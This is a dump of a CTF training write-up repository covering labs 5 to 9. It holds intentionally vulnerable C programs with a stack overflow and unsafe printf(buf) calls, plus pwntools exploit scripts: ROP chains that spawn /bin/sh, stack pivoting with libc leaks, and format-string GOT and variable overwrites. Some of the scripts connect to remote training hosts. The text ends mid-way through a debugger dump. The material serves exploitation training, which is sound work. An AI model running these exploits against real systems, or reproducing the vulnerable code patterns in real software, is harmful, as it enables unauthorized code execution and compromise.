| gcc -fno-stack-protector -m32 -static -mpreferred-stack-boundary=2 simplerop.c -o simplerop 3 | -------------------------------------------------------------------------------- /LAB/lab5/simplerop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab5/simplerop -------------------------------------------------------------------------------- /LAB/lab5/simplerop.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(){ 4 | char buf[20]; 5 | puts("ROP is easy is'nt it ?"); 6 | printf("Your input :"); 7 | fflush(stdout); 8 | read(0,buf,100); 9 | 10 | } 11 | -------------------------------------------------------------------------------- /LAB/lab5/simplerop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | from pwnpwnpwn import * 4 | from pwn import * 5 | 6 | host = "10.211.55.28" 7 | port = 8888 8 | 9 | r = remote(host,port) 10 | 11 | gadget = 0x809a15d # mov dword ptr [edx], eax ; ret 12 | pop_eax_ret = 0x80bae06 13 | pop_edx_ret = 0x806e82a 14 | pop_edx_ecx_ebx = 0x0806e850 15 | pop_eax_ret = 0x080bae06 16 | buf = 0x80ea060 17 | int_80 = 0x80493e1 18 | 19 | #write to memory 20 | payload = "a"*32 21 | payload += p32(pop_edx_ret) 22 | payload += p32(buf) 23 | payload += p32(pop_eax_ret) 24 | payload += "/bin" 25 | payload += p32(gadget) 26 | payload += p32(pop_edx_ret) 27 | payload += p32(buf+4) 28 | payload += p32(pop_eax_ret) 29 | payload += "/sh\x00" 30 | payload += p32(gadget) 31 | 32 | #write to register 33 | payload += p32(pop_edx_ecx_ebx) 34 | payload += p32(0) 35 | payload += p32(0) 36 | payload += p32(buf) 37 | payload += p32(pop_eax_ret) 38 | payload += p32(0xb) 39 | payload += p32(int_80) 40 | 41 | print len(payload) 42 | r.recvuntil(":") 43 | r.sendline(payload) 44 | 45 | r.interactive() 46 | -------------------------------------------------------------------------------- /LAB/lab5/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | from struct import pack 7 | 8 | p = lambda x : pack('I', x) 9 | 10 | IMAGE_BASE_0 = 0x08048000 # ./simplerop 11 | rebase_0 = lambda x : p(x + IMAGE_BASE_0) 12 | 13 | pop_edx_ecx_ebx = 0x0806e850 14 | 15 | rop = '' 16 | 17 | # write /bin/sh\x00 to 0x08048000 + 0x000a3060 18 | rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 19 | # rop += '//bi' 20 | rop += '/bin' 21 | rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 22 | rop += rebase_0(0x000a3060) 23 | rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret; 24 | rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 25 | rop += '/sh\x00' 26 | rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 27 | rop += rebase_0(0x000a3064) 28 | rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret; 29 | print "[+]write /bin/sh\x00 to 0x08048000 + 0x000a3060" 30 | 31 | # rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 32 | # rop += p(0x00000000) 33 | # rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 34 | # rop += rebase_0(0x000a3068) 35 | # rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret; 36 | # rop += rebase_0(0x000001c9) # 0x080481c9: pop ebx; ret; 37 | # rop += rebase_0(0x000a3060) 38 | # rop += rebase_0(0x0009e910) # 0x080e6910: pop ecx; push cs; or al, 0x41; ret; 39 | # rop += rebase_0(0x000a3068) 40 | # rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 41 | # rop += rebase_0(0x000a3068) 42 | 43 | # set ebx -> /bin/sh\x00, ecx = edx = 0 44 | rop += pack('I', pop_edx_ecx_ebx) 45 | rop += p(0) 46 | rop += p(0) 47 | rop += rebase_0(0x000a3060) 48 | print "[+]set ebx -> /bin/sh\x00, ecx = edx = 0" 49 | 50 | rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 51 | rop += p(0x0000000b) 52 | rop += rebase_0(0x00026ef0) # 0x0806eef0: int 0x80; ret; 53 | assert len(rop) <= 100 - 32 54 | 55 | io = process("./simplerop") 56 | 57 | payload = cyclic(32) + rop 58 | io.sendlineafter(" :", payload) 59 | 60 | io.interactive() 61 | io.close() 62 | 63 | -------------------------------------------------------------------------------- /LAB/lab5/tmp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from struct import pack 6 | 7 | p = lambda x : pack('I', x) 8 | 9 | IMAGE_BASE_0 = 0x08048000 # ./simplerop 10 | rebase_0 = lambda x : p(x + IMAGE_BASE_0) 11 | 12 | rop = '' 13 | 14 | # write /bin/sh\x00 to 0x08048000 + 0x000a3060 15 | rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 16 | rop += '/bin' 17 | rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 18 | rop += rebase_0(0x000a3060) 19 | rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret; 20 | rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 21 | rop += '/sh\x00' 22 | rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 23 | rop += rebase_0(0x000a3064) 24 | rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret; 25 | print "[+]write /bin/sh\x00 to 0x08048000 + 0x000a3060" 26 | 27 | # make ebx points to /bin/sh\x00 28 | rop += rebase_0(0x000001c9) # 0x080481c9: pop ebx; ret; 29 | rop += rebase_0(0x000a3060) 30 | print "[+]ebx -> /bin/sh\x00" 31 | 32 | rop += rebase_0(0x0009e910) # 0x080e6910: pop ecx; push cs; or al, 0x41; ret; 33 | rop += rebase_0(0x000a3068) 34 | rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 35 | rop += rebase_0(0x000a3068) 36 | rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 37 | rop += p(0x0000000b) 38 | rop += rebase_0(0x00026ef0) # 0x0806eef0: int 0x80; ret; 39 | # print rop 40 | print len(rop) 41 | -------------------------------------------------------------------------------- /LAB/lab6/makefile: -------------------------------------------------------------------------------- 1 | migration:migration.c 2 | gcc -m32 -z relro -z now -fno-stack-protector -mpreferred-stack-boundary=2 migration.c -o migration 3 | -------------------------------------------------------------------------------- /LAB/lab6/migration: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab6/migration -------------------------------------------------------------------------------- /LAB/lab6/migration.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int count = 1337 ; 4 | 5 | int main(){ 6 | if(count != 1337) 7 | _exit(1); 8 | count++; 9 | char buf[40]; 10 | setvbuf(stdout,0,2,0); 11 | puts("Try your best :"); 12 | read(0,buf,64); 13 | return ; 14 | } 15 | -------------------------------------------------------------------------------- /LAB/lab6/migration.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab6/migration.idb -------------------------------------------------------------------------------- /LAB/lab6/migration.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | from pwn import * 4 | import time 5 | 6 | host = "10.211.55.28" 7 | port = 8888 8 | 9 | # r = remote(host,port) 10 | r = process("./migration") 11 | 12 | 13 | read_plt = 0x8048380 14 | puts_plt = 0x8048390 15 | leave_ret = 0x08048418 16 | pop_edx_ret = 0x0804836d 17 | puts_got = 0x8049ff0 18 | buf = 0x0804b000-0x200 19 | buf2 = buf + 0x100 20 | payload = "a"*40 21 | payload += flat([buf,read_plt,leave_ret,0,buf,100]) 22 | r.recvuntil(":") 23 | r.send(payload) 24 | time.sleep(0.1) 25 | 26 | rop = flat([buf2,puts_plt,pop_edx_ret,puts_got,read_plt,leave_ret,0,buf2,100]) 27 | 28 | r.sendline(rop) 29 | r.recvuntil("\n") 30 | puts_off = 0x5fca0 31 | libc = u32(r.recv(4)) - puts_off 32 | print "libc:",hex(libc) 33 | time.sleep(0.1) 34 | system_off = 0x3ada0 35 | system = libc + system_off 36 | rop2 = flat([buf,system,0,buf2+4*4,"/bin/sh"]) 37 | r.sendline(rop2) 38 | r.interactive() 39 | -------------------------------------------------------------------------------- /LAB/lab6/stack-pivot.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | from time import sleep 7 | context.log_level = "debug" 8 | context.terminal = ["deepin-terminal", "-x", "sh", "-c"] 9 | def DEBUG(): 10 | raw_input("DEBUG: ") 11 | gdb.attach(io) 12 | 13 | elf = ELF("./migration") 14 | libc = elf.libc 15 | 16 | # bufAddr = elf.bss() 17 | bufAddr = 0x0804a000 18 | readPlt = elf.plt["read"] 19 | readGot = elf.got["read"] 20 | putsPlt = elf.plt["puts"] 21 | p1ret = 0x0804836d 22 | p3ret = 0x08048569 23 | leaveRet = 0x08048504 24 | 25 | 26 | io = process("./migration") 27 | # DEBUG() 28 | payload = flat([cyclic(0x28), bufAddr + 0x100, readPlt, leaveRet, 0, bufAddr + 0x100, 0x100]) 29 | io.sendafter(" :\n", payload) 30 | sleep(0.1) 31 | 32 | payload = flat([bufAddr + 0x600, putsPlt, p1ret, readGot, readPlt, leaveRet, 0, bufAddr + 0x600, 0x100]) 33 | io.send(payload) 34 | sleep(0.1) 35 | # print io.recv() 36 | libcBase = u32(io.recv()[: 4]) - libc.sym['read'] 37 | success("libcBase -> {:#x}".format(libcBase)) 38 | pause() 39 | 40 | payload = flat([bufAddr + 0x100, readPlt, p3ret, 0, bufAddr + 0x100, 0x100, libcBase + libc.sym['system'], 0xdeadbeef, bufAddr + 0x100]) 41 | io.send(payload) 42 | sleep(0.1) 43 | io.send("$0\0") 44 | sleep(0.1) 45 | 46 | io.interactive() 47 | io.close() 48 | -------------------------------------------------------------------------------- /LAB/lab7/Makefile: -------------------------------------------------------------------------------- 1 | crack:crack.c 2 | gcc -m32 crack.c -o crack 3 | -------------------------------------------------------------------------------- /LAB/lab7/crack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab7/crack -------------------------------------------------------------------------------- /LAB/lab7/crack.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | unsigned int password ; 7 | 8 | int main(){ 9 | 10 | setvbuf(stdout,0,2,0); 11 | char buf[100]; 12 | char input[16]; 13 | int fd ; 14 | srand(time(NULL)); 15 | fd = open("/dev/urandom",0); 16 | read(fd,&password,4); 17 | printf("What your name ? "); 18 | read(0,buf,99); 19 | printf("Hello ,"); 20 | printf(buf); 21 | printf("Your password :"); 22 | read(0,input,15); 23 | if(atoi(input) != password){ 24 | puts("Goodbyte"); 25 | }else{ 26 | puts("Congrt!!"); 27 | system("cat /home/crack/flag"); 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /LAB/lab7/crack.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab7/crack.idb -------------------------------------------------------------------------------- /LAB/lab7/crack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | from pwn import * 4 | 5 | 6 | host = "training.pwnable.tw" 7 | port = 11007 8 | 9 | r = remote(host,port) 10 | 11 | password_addr = 0x804a048 12 | r.recvuntil("?") 13 | 14 | 15 | r.sendline(p32(password_addr) + "#" + "%10$s" + "#" ) 16 | r.recvuntil("#") 17 | p = r.recvuntil("#") 18 | password = u32(p[:4]) 19 | r.recvuntil(":") 20 | r.sendline(str(password)) 21 | r.interactive() 22 | -------------------------------------------------------------------------------- /LAB/lab7/hijack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | 7 | putsGot = 0x804A01C 8 | bullet = 0x804872B 9 | 10 | io = process("./crack") 11 | payload = fmtstr_payload(10, {putsGot: bullet}) 12 | io.sendlineafter(" ? ", payload) 13 | 14 | io.sendline() 15 | io.interactive() 16 | io.close() 17 | -------------------------------------------------------------------------------- /LAB/lab7/leak.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | 7 | pwdAddr = 0x804A048 8 | payload = p32(pwdAddr) + "|%10$s||" 9 | 10 | io = process("./crack") 11 | io.sendlineafter(" ? ", payload) 12 | io.recvuntil("|") 13 | leaked = u32(io.recvuntil("||", drop = True)) 14 | io.sendlineafter(" :", str(leaked)) 15 | 16 | io.interactive() 17 | io.close() 18 | -------------------------------------------------------------------------------- /LAB/lab7/overwrite.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | 7 | pwdAddr = 0x804A048 8 | payload = fmtstr_payload(10, {pwdAddr: 6}) 9 | 10 | io = process("./crack") 11 | 12 | io.sendlineafter(" ? ", payload) 13 | io.sendlineafter(" :", "6") 14 | 15 | io.interactive() 16 | io.close() 17 | -------------------------------------------------------------------------------- /LAB/lab8/Makefile: -------------------------------------------------------------------------------- 1 | craxme:craxme.c 2 | gcc -m32 craxme.c -o craxme 3 | -------------------------------------------------------------------------------- /LAB/lab8/craxme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab8/craxme -------------------------------------------------------------------------------- /LAB/lab8/craxme.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int magic = 0 ; 4 | 5 | int main(){ 6 | char buf[0x100]; 7 | setvbuf(stdout,0,2,0); 8 | puts("Please crax me !"); 9 | printf("Give me magic :"); 10 | read(0,buf,0x100); 11 | printf(buf); 12 | if(magic == 0xda){ 13 | system("cat /home/craxme/flag"); 14 | }else if(magic == 0xfaceb00c){ 15 | system("cat /home/craxme/craxflag"); 16 | }else{ 17 | puts("You need be a phd"); 18 | } 19 | 20 | } 21 | -------------------------------------------------------------------------------- /LAB/lab8/craxme.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab8/craxme.idb -------------------------------------------------------------------------------- /LAB/lab8/craxme.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | from pwnpwnpwn import * 4 | from pwn import * 5 | 6 | #host = "10.211.55.28" 7 | #port = 8888 8 | host = "training.angelboy.tw" 9 | port = 11008 10 | 11 | 12 | r = remote(host,port) 13 | 14 | def fmt(prev,word,index): 15 | if prev < word : 16 | result = word - prev 17 | fmtstr = "%" + str(result) + "c" 18 | elif prev == word : 19 | result = 0 20 | else : 21 | result = 256 - prev + word 22 | fmtstr = "%" + str(result) + "c" 23 | fmtstr += "%" + str(index) + "$hhn" 24 | return fmtstr 25 | 26 | magic = 0x804a038 27 | payload = p32(magic) 28 | payload += p32(magic+1) 29 | payload += p32(magic+2) 30 | payload += p32(magic+3) 31 | targat = 0xfaceb00c 32 | 33 | prev = 4*4 34 | for i in range(4): 35 | payload += fmt(prev,(targat >> 8*i) & 0xff,7+i) 36 | prev = (targat >> 8*i) & 0xff 37 | 38 | r.recvuntil(":") 39 | r.sendline(payload) 40 | 41 | r.interactive() 42 | -------------------------------------------------------------------------------- /LAB/lab8/craxme2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | from pwn import * 4 | 5 | 6 | host = "training.pwnable.tw" 7 | port = 11008 8 | 9 | r = remote(host,port) 10 | printf_got = 0x804a010 11 | puts_got = 0x804a018 12 | system_plt = 0x8048410 13 | target = 0x0804859b 14 | payload = p32(puts_got) 15 | payload += p32(puts_got+1) 16 | payload += p32(puts_got+2) 17 | payload += p32(puts_got+3) 18 | payload += p32(printf_got) 19 | payload += p32(printf_got+1) 20 | payload += p32(printf_got+2) 21 | payload += p32(printf_got+3) 22 | 23 | prev = 4*8 24 | for i in range(4): 25 | payload += fmtchar(prev,(target >> i*8) & 0xff,7+i) 26 | prev = (target >> i*8) & 0xff 27 | 28 | for i in range(4): 29 | payload += fmtchar(prev,(system_plt >> i*8) & 0xff,11+i) 30 | prev = (system_plt >> i*8) & 0xff 31 | 32 | r.recvuntil(":") 33 | r.sendline(payload) 34 | r.interactive() 35 | -------------------------------------------------------------------------------- /LAB/lab8/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | from sys import argv 7 | context.log_level = "debug" 8 | 9 | magicAddr = ELF("./craxme").sym["magic"] 10 | 11 | if argv[1] == "1": 12 | payload = fmtstr_payload(7, {magicAddr: 0xda}) 13 | else: 14 | payload = fmtstr_payload(7, {magicAddr: 0xfaceb00c}) 15 | 16 | io = process("./craxme") 17 | io.sendlineafter(" :", payload) 18 | io.interactive() 19 | io.close() 20 | -------------------------------------------------------------------------------- /LAB/lab9/Makefile: -------------------------------------------------------------------------------- 1 | playfmt:playfmt.c 2 | gcc -m32 playfmt.c -o playfmt 3 | -------------------------------------------------------------------------------- /LAB/lab9/libc-2.24.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab9/libc-2.24.so -------------------------------------------------------------------------------- /LAB/lab9/playfmt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab9/playfmt -------------------------------------------------------------------------------- /LAB/lab9/playfmt.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | char buf[200] ; 6 | 7 | void do_fmt(){ 8 | while(1){ 9 | read(0,buf,200); 10 | if(!strncmp(buf,"quit",4)) 11 | break; 12 | printf(buf); 13 | } 14 | return ; 15 | } 16 | 17 | void play(){ 18 | puts("====================="); 19 | puts(" Magic echo Server"); 20 | puts("====================="); 21 | do_fmt(); 22 | return; 23 | } 24 | 25 | int main(){ 26 | setvbuf(stdout,0,2,0); 27 | play(); 28 | return; 29 | } 30 | -------------------------------------------------------------------------------- /LAB/lab9/playfmt.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/LAB/lab9/playfmt.idb -------------------------------------------------------------------------------- /LAB/lab9/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | __Auther__ = 'M4x' 4 | 5 | from pwn import * 6 | context.arch = 'i386' 7 | context.terminal = ['deepin-terminal', '-x', 'sh', '-c'] 8 | 9 | io = process("./playfmt") 10 | libc = ELF("/lib/i386-linux-gnu/libc.so.6") 11 | elf = ELF("./playfmt") 12 | 13 | ''' 14 | Breakpoint *do_fmt+64 15 | pwndbg> x/3s 0x804a060 16 | 0x804a060 : "..%8$p....%6$p."... 17 | 0x804a06f : ".11111111" 18 | 0x804a079 : "" 19 | pwndbg> stack 25 20 | 00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x38252e2e ('..%8') 21 | 01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* 'quit' */ 22 | 02:0008│ 0xffa077c8 ◂— 0x4 23 | 03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 24 | 04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d 25 | 05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 26 | 06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 27 | 07:001c│ 0xffa077dc —▸ 0x8048584 (play+59) ◂— nop 28 | 08:0020│ 0xffa077e0 —▸ 0xf7eb0d60 (_IO_2_1_stdout_) ◂— 0xfbad2887 29 | 09:0024│ 0xffa077e4 ◂— 0x0 30 | 0a:0028│ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 31 | 0b:002c│ 0xffa077ec —▸ 0x80485b1 (main+42) ◂— nop 32 | 0c:0030│ 0xffa077f0 —▸ 0xf7eb03dc (__exit_funcs) —▸ 0xf7eb11e0 (initial) ◂— 0x0 33 | 0d:0034│ 0xffa077f4 —▸ 0xffa07810 ◂— 0x1 34 | 0e:0038│ 0xffa077f8 ◂— 0x0 35 | 0f:003c│ 0xffa077fc —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 36 | 10:0040│ 0xffa07800 ◂— 0x1 37 | 11:0044│ 0xffa07804 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 38 | 12:0048│ 0xffa07808 ◂— 0x0 39 | 13:004c│ 0xffa0780c —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 40 | 14:0050│ 0xffa07810 ◂— 0x1 41 | 15:0054│ 0xffa07814 —▸ 0xffa078a4 —▸ 0xffa083d6 ◂— './playfmt' 42 | 16:0058│ 0xffa07818 —▸ 0xffa078ac —▸ 0xffa083e0 ◂— 'NO_AT_BRIDGE=1' 43 | 17:005c│ 0xffa0781c ◂— 0x0 44 | ... ↓ 45 | ''' 46 | # gdb.attach(io, "b *do_fmt+64\nc") 47 | io.send("..%8$p....%6$p..11111111\0") 48 | io.recvuntil("..") 49 | libc.address = int(io.recvuntil("..", drop = True), 16) - libc.sym['_IO_2_1_stdout_'] 50 | success("libc.address -> {:#x}".format(libc.address)) 51 | io.recvuntil("..") 52 | stack = int(io.recvuntil("..", drop = True), 16) - 0x28 53 | success("stack -> {:#x}".format(stack)) 54 | pause() 55 | 56 | ''' 57 | pwndbg> x/3s 0x804a060 58 | 0x804a060 : "%30684c%21$hn%1"... 59 | 0x804a06f : "6c%22$hn2222222"... 60 | 0x804a07e : "2" 61 | pwndbg> stack 25 62 | 00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x36303325 ('%306') 63 | 01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* 'quit' */ 64 | 02:0008│ 0xffa077c8 ◂— 0x4 65 | 03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 66 | 04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d 67 | 05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 68 | 06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 69 | 07:001c│ 0xffa077dc —▸ 0x8048584 (play+59) ◂— nop 70 | 08:0020│ 0xffa077e0 —▸ 0xf7eb0d60 (_IO_2_1_stdout_) ◂— 0xfbad2887 71 | 09:0024│ 0xffa077e4 ◂— 0x0 72 | 0a:0028│ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 73 | 0b:002c│ 0xffa077ec —▸ 0x80485b1 (main+42) ◂— nop 74 | 0c:0030│ 0xffa077f0 —▸ 0xf7eb03dc (__exit_funcs) —▸ 0xf7eb11e0 (initial) ◂— 0x0 75 | 0d:0034│ 0xffa077f4 —▸ 0xffa07810 ◂— 0x1 76 | 0e:0038│ 0xffa077f8 ◂— 0x0 77 | 0f:003c│ 0xffa077fc —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 78 | 10:0040│ 0xffa07800 ◂— 0x1 79 | 11:0044│ 0xffa07804 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 80 | 12:0048│ 0xffa07808 ◂— 0x0 81 | 13:004c│ 0xffa0780c —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 82 | 14:0050│ 0xffa07810 ◂— 0x1 83 | 15:0054│ 0xffa07814 —▸ 0xffa078a4 —▸ 0xffa083d6 ◂— './playfmt' 84 | 16:0058│ 0xffa07818 —▸ 0xffa078ac —▸ 0xffa083e0 ◂— 'NO_AT_BRIDGE=1' 85 | 17:005c│ 0xffa0781c ◂— 0x0 86 | ... ↓ 87 | ''' 88 | payload = "%{}c%{}$hn".format((stack + 0x1c) & 0xffff, 0x15) 89 | # payload += "%{}c%{}$hn".format((stack + 0x2c) & 0xffff - (stack + 0x1c) & 0xffff, 0x16) 90 | payload += "%{}c%{}$hn".format(0x10, 0x16) 91 | payload += '22222222\0' 92 | info(payload) 93 | io.sendafter("11111111", payload) 94 | pause() 95 | 96 | ''' 97 | pwndbg> x/3s 0x804a060 98 | 0x804a060 : "%40976c%57$hn%2"... 99 | 0x804a06f : "c%59$hn33333333" 100 | 0x804a07e : "" 101 | pwndbg> stack 25 102 | 00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x39303425 ('%409') 103 | 01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* 'quit' */ 104 | 02:0008│ 0xffa077c8 ◂— 0x4 105 | 03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 106 | 04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d 107 | 05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 108 | 06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 109 | 07:001c│ 0xffa077dc —▸ 0x8048584 (play+59) ◂— nop 110 | 08:0020│ 0xffa077e0 —▸ 0xf7eb0d60 (_IO_2_1_stdout_) ◂— 0xfbad2887 111 | 09:0024│ 0xffa077e4 ◂— 0x0 112 | 0a:0028│ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 113 | 0b:002c│ 0xffa077ec —▸ 0x80485b1 (main+42) ◂— nop 114 | 0c:0030│ 0xffa077f0 —▸ 0xf7eb03dc (__exit_funcs) —▸ 0xf7eb11e0 (initial) ◂— 0x0 115 | 0d:0034│ 0xffa077f4 —▸ 0xffa07810 ◂— 0x1 116 | 0e:0038│ 0xffa077f8 ◂— 0x0 117 | 0f:003c│ 0xffa077fc —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 118 | 10:0040│ 0xffa07800 ◂— 0x1 119 | 11:0044│ 0xffa07804 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 120 | 12:0048│ 0xffa07808 ◂— 0x0 121 | 13:004c│ 0xffa0780c —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 122 | 14:0050│ 0xffa07810 ◂— 0x1 123 | 15:0054│ 0xffa07814 —▸ 0xffa078a4 —▸ 0xffa077dc —▸ 0x8048584 (play+59) ◂— nop 124 | 16:0058│ 0xffa07818 —▸ 0xffa078ac —▸ 0xffa077ec —▸ 0x80485b1 (main+42) ◂— nop 125 | 17:005c│ 0xffa0781c ◂— 0x0 126 | ... ↓ 127 | ''' 128 | # gdb.attach(io, "b *do_fmt+64\nc") 129 | payload = "%{}c%{}$hn".format(elf.got['printf'] & 0xffff, 0x39) 130 | # payload += "%{}c%{}$hn".format((elf.got['printf'] & 0xffff + 2) - (elf.got['printf'] & 0xffff), 0x3b) 131 | payload += "%{}c%{}$hn".format(2, 0x3b) 132 | payload += "33333333\0" 133 | info(payload) 134 | io.sendafter("22222222", payload) 135 | pause() 136 | 137 | ''' 138 | pwndbg> x/3s 0x804a060 139 | 0x804a060 : "%211c%11$hhn%31"... 140 | 0x804a06f : "325c%7$hn444444"... 141 | 0x804a07e : "44" 142 | pwndbg> stack 25 143 | 00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x31313225 ('%211') 144 | 01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* 'quit' */ 145 | 02:0008│ 0xffa077c8 ◂— 0x4 146 | 03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 147 | 04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d 148 | 05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 149 | 06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 150 | 07:001c│ 0xffa077dc —▸ 0x804a010 (_GLOBAL_OFFSET_TABLE_+16) —▸ 0xf7d46930 (printf) ◂— call 0xf7e1dae9 151 | 08:0020│ 0xffa077e0 —▸ 0xf7eb0d60 (_IO_2_1_stdout_) ◂— 0xfbad2887 152 | 09:0024│ 